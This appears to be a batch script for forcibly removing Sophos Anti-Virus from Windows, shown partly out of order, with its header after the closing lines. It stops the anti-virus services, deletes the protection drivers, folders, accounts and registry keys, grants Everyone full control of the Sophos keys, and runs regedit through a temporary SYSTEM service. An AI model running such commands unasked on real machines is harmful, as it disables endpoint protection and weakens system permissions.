echo [-HKEY_CLASSES_ROOT\Interface\{1474930F-6D2F-42E1-A604-958E2A287D32}] >> %TEMP%\SOTMP.REG
echo [-HKEY_CLASSES_ROOT\Interface\{1E4DEB88-3386-4E80-A7D1-9997C39A570D}] >> %TEMP%\SOTMP.REG
echo [-HKEY_CLASSES_ROOT\Interface\{4629634A-1AF8-4E02-B5A2-0273FE770C74}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4C7CA525-1016-4C70-A116-7AA4FE0DAF97}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5272D27B-11B1-4687-85FC-21B6214E554A}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7CBCADE4-7AA7-43AE-BD20-D88223B6353E}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CBF57A6D-243A-4FE7-B9FA-22A67B4D056B}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FF20AFAB-E530-4277-A2EB-A9051D7E3435}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BBA960BE-6A97-4996-9ECB-AA313BEBF37A}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\ALsvc.exe] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{037F2C54-40E9-437E-B8EA-487AEB148A4B}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{5272D27B-11B1-4687-85FC-21B6214E554A}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{66241874-FF4F-47FA-9A47-59BE901FFCC2}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{CFC5C7CA-DA4C-4CFB-B16A-65193004E9C2}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1474930F-6D2F-42E1-A604-958E2A287D32}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1E4DEB88-3386-4E80-A7D1-9997C39A570D}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{4629634A-1AF8-4E02-B5A2-0273FE770C74}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BDC72FC6-3EEE-49D8-8D37-5D3655A704FC}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{CE94B62D-25F3-4430-AA85-A22C2888EE65}] >> %TEMP%\SOTMP.REG
REM ==============================================================================================================
ECHO.
ECHO Stopping Sophos Services...
net stop "Sophos Agent" >NUL 2> NUL
net stop "Sophos Anti-Virus" >NUL 2> NUL
net stop "Sophos Anti-Virus status reporter" >NUL 2> NUL
net stop "Sophos AutoUpdate Service" >NUL 2> NUL
net stop "Sophos Message Router" > NUL 2> NUL
net stop sweepupdate > NUL 2> NUL
net stop sweepnet > NUL 2> NUL
net stop "Sophos Cache Manager" > NUL 2> NUL
ECHO Completed.
ECHO.
ECHO Unregistering Sophos DLLs...
REM === Sophos Anti-Virus DLLs ===
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\BackgroundScanClient.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SAVCleanupService.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavMain.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavProgress.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\AuthorisedLists.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\BackgroundScanning.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Categories.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ComponentManager.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Configuration.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\DesktopMessaging.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\detoured.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\DriveProcessor.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\EEConsumer.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\FilterProcessors.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\FSDecomposer.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ICAdapter.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ICManagement.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ICProcessors.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\LegacyConsumers.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Localisation.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Logging.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\msvcp71.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\msvcr71.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\osdp.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Persistance.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavAdapter.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SAVI.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SAVI0.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SAVMSCM.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavNeutralRes.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavRes.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResChs.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResCht.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResDeu.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResEng.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResEsp.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResFra.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResIt.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResJap.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavShellExt.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ScanEditExports.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ScanEditFacade.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ScanManagement.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Security.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SIPSManagement.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SophtainerAdapter.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SystemInformation.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ThreatDetection.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ThreatManagement.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Translators.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\veex.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\VirusDetection.dll"
REM === SAV 4.x DLLs ===
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ACCESSDT.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\DESKRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ELOGRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ICHKRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ICMONRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ICNTSYS.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ICSTAT.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\MEADAPTER.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\NMSGRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\OSDP.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SAVI.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SAVIREG.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SAVMSCM.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SHRDRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SMTPRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SNMPPP.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SNMPRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SNMPWRAP.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SWEEPNT.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SWOUTPUT.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SWOUTRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\VEEX.DLL"
REM === Sophos AutoUpdate DLLs ===
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\AUAdapter.dll"
::regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\boost_date_time-vc71-mt-1_32.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\ChannelUpdater.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\cidsync.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\config.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\crypto.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\EECustomActions.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\inetconn.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\InstlMgr.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\ispsheet.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\libcurl.dll"
::regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\libeay32.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\Logger.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\retailer.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\SAUConfigDLL.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\swlocale.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\xmlcpp.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\xmlparse.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\xmltok.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\ALMon.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\ALsvc.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\ALUpdate.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\AUAdapter.exe"
ECHO Completed.
ECHO.
ECHO Deleting Sophos Services...
"%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavService.exe" /UnregServer >NUL 2>NUL
"%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavAdminService.exe" /UnregServer >NUL 2>NUL
"%PROGRAMFILES%\Sophos\Remote Management System\ManagementAgentNT.exe" -uninstall >NUL 2>NUL
"%PROGRAMFILES%\Sophos\Remote Management System\AutoUpdateAgentNT.exe" -uninstall >NUL 2>NUL
"%PROGRAMFILES%\Sophos\AutoUpdate\ALSvc.exe" /UnregServer >NUL 2>NUL
"%PROGRAMFILES%\Sophos\AutoUpdate\ALMon.exe" /UnRegServer >NUL 2>NUL
"%PROGRAMFILES%\Sophos\Remote Management System\RouterNT.exe" -uninstall >NUL 2>NUL
sc delete sweepupdate >NUL 2>NUL
sc delete sweepnet >NUL 2>NUL
ECHO Completed.
Echo.
ECHO Removing Sophos Installed Files...
RD /S /Q "%PROGRAMFILES%\SOPHOS\AutoUpdate" >NUL 2>NUL
RD /S /Q "%PROGRAMFILES%\SOPHOS\Sophos Anti-Virus" >NUL 2>NUL
RD /S /Q "%PROGRAMFILES%\SOPHOS\Remote Management System" >NUL 2>NUL
RD /S /Q "%PROGRAMFILES%\SOPHOS\" >NUL 2>NUL
RD /S /Q "%ALLUSERSPROFILE%\Sophos" >NUL 2>NUL
RD /S /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Sophos" >NUL 2>NUL
RD /s /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Sophos" >NUL 2>NUL
RD /s /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Sophos Anto-Virus" >NUL 2>NUL
RD /S /Q "%ALLUSERSPROFILE%\Application Data\Sophos" >NUL 2>NUL
RD /S /Q "%USERPROFILE%\Application Data\Sophos" >NUL 2>NUL
DEL /F /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Startup\AutoUpdate Monitor.lnk" >NUL 2>NUL
RD /S /Q "%WINDIR%\Installer\{09C6BF52-6DBA-4A97-9939-B6C24E4738BF}" >NUL 2>NUL
RD /S /Q "%WINDIR%\Installer\{15C418EB-7675-42be-B2B3-281952DA014D}" >NUL 2>NUL
RD /S /Q "%WINDIR%\Installer\{C12953C2-4F15-4A6C-91BC-511B96AE2775}" >NUL 2>NUL
RD /S /Q "%WINDIR%\Installer\{FF11005D-CBC8-45D5-A288-25C7BB304121}" >NUL 2>NUL
RD /S /Q "%WINDIR%\Installer\{034759DA-E21A-4795-BFB3-C66D17FAD183}" >NUL 2>NUL
DEL /F /Q "%WINDIR%\System32\Drivers\savonaccesscontrol.sys" >NUL 2>NUL
DEL /F /Q "%WINDIR%\System32\Drivers\savonaccessfilter.sys" >NUL 2>NUL
DEL /F /Q "%WINDIR%\System32\drivers\savonaccess.sys" >NUL 2>NUL
RD /S /Q "%PROGRAMFILES%\SOPHOS Sweep for NT" >NUL 2>NUL
DEL /F /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Startup\InterCheck Monitor.lnk" >NUL 2>NUL
DEL /F /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Startup\Remote Update Monitor.lnk" >NUL 2>NUL
DEL /F /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Sophos\Remote Update Monitor.lnk" >NUL 2>NUL
DEL /F /Q "%USERSPROFILE%\Start Menu\Programs\Startup\Remote Update Monitor.lnk" >NUL 2>NUL
RD /S /Q "%PROGRAMFILES%\Sophos\Remote Update" >NUL 2>NUL
ECHO Completed.
REM === Remove the typical Sophos account/groups for Sophos AutoUpdate ===
ECHO.
ECHO Removing Sophos Accounts and Groups...
Net user SophosSAU%COMPUTERNAME%0 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%1 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%2 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%3 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%4 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%5 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%6 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%7 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%8 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%9 /DELETE >NUL 2>NUL
Net localgroup SophosAdministrator /DELETE >NUL 2> NUL
Net localgroup SophosOnAccess /DELETE >NUL 2> NUL
Net localgroup SophosPowerUser /DELETE >NUL 2> NUL
Net localgroup SophosUser /DELETE >NUL 2> NUL
ECHO Completed.
ECHO Changing Permissions on Sophos...
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0000 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0001 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0002 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0003 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0004 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0005 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0006 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0007 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0008 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0009 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-000a /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-000b /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-000c /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-000d /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-000e /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-Adapter /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-Info /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SavAdminService /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg "HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\Sophos Anti-Virus" /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg "HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\Sophos Anti-Virus Daily" /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg "HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\Sophos Anti-Virus InterCheck" /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\AutoUpdate /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\AutoUpdate\Inetconn.Connection /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\AutoUpdate\Products /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\AutoUpdate\Service /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Messaging System /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Messaging System\CertificationIdentityKeys /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Messaging System\Router /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Remote Management System /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Remote Management System\CertificationIdentityKeys /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Remote Management System\ManagementAgent /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\Application /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\Components /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\PP /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\SAVUI /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\Status /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\UpdateStatus /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SweepNT /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Classes /GRANT=Administrators=F >NUL 2>NUL
ECHO Completed.
Echo.
ECHO Deleting SAVI...
REG DELETE HKLM\Software\Sophos\SAVI /F > NUL 2> NUL
ECHO REGEDIT4 > %TEMP%\SOSAVI.REG
ECHO. >> %TEMP%\SOSAVI.REG
ECHO [-HKEY_LOCAL_MACHINE\Software\Sophos\SAVI] >> %TEMP%\SOSAVI.REG
REGEDIT /S %TEMP%\SOSAVI.REG >NUL 2>NUL
ECHO Completed.
Echo.
ECHO Removing Sophos Registry Keys...
SC create SopReg binpath= "cmd /K START /WAIT REGEDIT /S %TEMP%\SOTMP.REG" type= own type= interact > NUL
sc start "SopReg" > NUL
sc delete "SopReg" > NUL
REGEDIT /S %TEMP%\SOTMP.REG >NUL 2>NUL
ECHO Completed.
ECHO.
ECHO Checking for Microsoft Vista (2)...
ver|find "Version 6.0" >NUL
if %errorlevel% equ 0 (
Echo.
Echo Found: Changing UAC back to alert mode...
ECHO REGEDIT4 > %temp%\sopuac.reg
ECHO. >> %temp%\sopuac.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] >> %temp%\sopuac.reg
ECHO "ConsentPromptBehaviorAdmin"=dword:00000002 >> %temp%\sopuac.reg
regedit /S %temp%\sopuac.reg >NUL 2>NUL
ECHO Completed.
) ELSE (Echo Microsoft Vista not found.)
REM === Deletes Temp files ===
DEL /F /Q %TEMP%\SOTMP.REG >NUL 2>NUL
DEL /F /Q %TEMP%\SOPUAC.REG >NUL 2>NUL
DEL /F /Q %TEMP%\SOSAVI.REG >NUL 2>NUL
ECHO.
ECHO ====================================================
ECHO Script Completed.
ECHO.
ECHO please reboot the computer and run this script again
ECHO to remove files that may currently be in use.
ECHO ====================================================
Echo.
Pause
EXIT
SC.zip - ftp://ftp.microsoft.com/reskit/win2000/sc.zip
Subinacl.exe - http://www.microsoft.com/downloads/details.aspx?FamilyID=e8ba3e56-d8fe-4a91-93cf-ed6985e3927b&displaylang=en
@ECHO OFF
ECHO ==================================================================
ECHO REMSAV-ALL-211.BAT
ECHO ------------------------------------------------------------------
ECHO Sophos Anti-Virus 4/5/6/7.x -- Removal Script V2.11
ECHO.
ECHO NOTE: Please make a full backup of the computer before you continue.
ECHO.
ECHO Do NOT run this script on computers with the following:-
